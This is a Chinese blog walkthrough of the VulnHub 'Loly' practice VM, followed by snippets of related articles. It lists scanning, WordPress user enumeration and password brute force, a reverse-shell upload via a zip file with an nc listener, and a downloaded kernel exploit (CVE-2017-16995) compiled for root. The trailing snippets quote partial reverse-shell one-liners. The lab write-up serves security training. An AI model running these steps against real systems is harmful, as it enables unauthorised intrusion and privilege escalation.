vulnhub之Loly的实践

VSole2023-01-16 10:38:46

今天实践的是vulnhub的Loly镜像,

下载地址,https://download.vulnhub.com/loly/Loly.ova,

用workstation导入,做地址扫描,sudo netdiscover -r 192.168.58.0/24,

176就是靶机,

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.176,

有http服务,做一下目录暴破,dirb http://192.168.58.176,

浏览器访问http://192.168.58.176/wordpress,进一步点击登录,发现需要用域名,

本地添加上域名静态记录,192.168.58.176 loly.lc,再次访问,需要用户名密码,

用kali攻击机做用户名扫描,

wpscan --url http://loly.lc/wordpress --enumerate u,发现用户loly,

继续用kali攻击机做密码暴破,

wpscan --url http://loly.lc/wordpress -U loly -P /usr/share/wordlists/rockyou.txt,得到密码,fernando,

用户名密码登录,发现一处可以上传文件的入口,提示不能直接上传php文件,可以上传zip,会自动解压,

直接用kali攻击机上自带的web shell文件,

cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php,

改一下反弹的地址和端口,再压缩成zip,zip shell.zip shell.php,

从kali攻击机的浏览器上传,

kali攻击机上开个反弹shell监听,nc -lvp 4444,

浏览器访问http://loly.lc/wordpress/wp-content/banners/shell.php,

获取到反弹shell,不是root,需要提权,

查看系统信息,跟上期需要提权的情况一样,

还是本地创建一个ubuntu16.04.1的虚机,

下载poc源码,wget https://www.exploit-db.com/download/45010,

编译,mv 45010 cve-2017-16995.c,gcc cve-2017-16995.c -o poc,

把编译好的poc文件搞到靶机上,执行,chmod +x poc,./poc,

获取到新的shell,id确认是root,

shellloly
本作品采用《CC 协议》,转载必须注明作者和本文链接
vulnhub之Loly的实践
2023-01-16 10:38:46
今天实践的是vulnhub的Loly镜像,下载地址,https://download.vulnhub.com
OneEDR 2.5版本让恶意Webshell“现原形”
shell编程15例(三)
2022-03-25 07:43:19
1、统计当前 Linux 系统中可以登录计算机的账户有多少个 #!/bin/bash # 统计当前 Linux 系统中可以登录计算机的账户有多少个 #方法 1: grep "bash$" /etc/passwd | wc -l #方法 2: awk -f: '/bash$/{x++}end{print x}' /etc/passwd
shell编程15例(一)
2022-03-23 07:53:04
1、编写hello world脚本 #!/bin/bash # 编写hello world脚本 echo "Hello World!" 2、通过位置变量创建 Linux 系统账户及密码 #!/bin/bash # 通过位置变量创建 Linux 系统账户及密码
Electron_shell是一款功能强大且隐蔽性极强的远程访问红队工具,该工具基于JavaScript语言开发,专为红队研究人员设计,可以利用Electron的功能来实现命令注入,并实现了其他的远程控制方法。
反弹Shell大全与原理
2023-04-25 10:15:00
reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。对方主机在局域网内,从外网无法直接访问。对方主机上存在WAF,对主动连接发来的请求数据检测严格,而对向外发出的请求不进行检测或检测较少。对方由于防火墙等限制,对方机器只能发送请求,不能接收请求。在渗透测试过程中,得到webshell后一般我们会反弹shell。反弹shell原理A主机开启9090端口的tcp服务
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。我们先来讲一下什么是正向连接和反向连接。centos执行python -c 'import socket,subprocess,os;s=socket.socket;s.connect;os.dup2; os.dup2; os.dup2;p=subprocess.call;'. 这个payload是反向连接并且只支持Linux,Windows可以参考离别歌师傅的python windows正向连接后门。这样会把目标机的/bin/bash反弹给攻击机但是很多Linux的nc很多都是阉割版的,如果目标机器没有nc或者没有-e选项的话,不建议使用nc的方式.PHP攻击机监听nc -lvvp 4444. 要求目标机器有php然后执行php -r '$sock=fsockopen;exec;'. 加载64位的shellcode需要用64位的msbuildC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
这里你可以理解为 a = 1,同时还可以 a =2、a = 3 ,不同的值都可以复制给同一个 变量 a 。Shell常见的变量之一系统变量,主要是用于对参数判断和命令返回值判断时使用,系统变量详解如下:。令或程序执行完后的状态,返回0表示执行成功;显示当前主机名;
自己的小网站跑在阿里云的 ECS 上面, 偶尔也去分析分析自己网站服务器日志,看看网站的访问量。看看有没有黑阔搞破坏!于是收集,整理一些服务器日志分析命令,大家可以试试!配合sort进一步排序。uniq -c 相当于分组统计并把统计数放在最前面cat?
自己的小网站跑在阿里云的 ECS 上面, 偶尔也去分析分析自己网站服务器日志,看看网站的访问量。看看有没有黑客搞破坏!于是收集,整理一些服务器日志分析命令,大家可以试试!配合sort进一步排序。uniq -c 相当于分组统计并把统计数放在最前面cat?
VSole
网络安全专家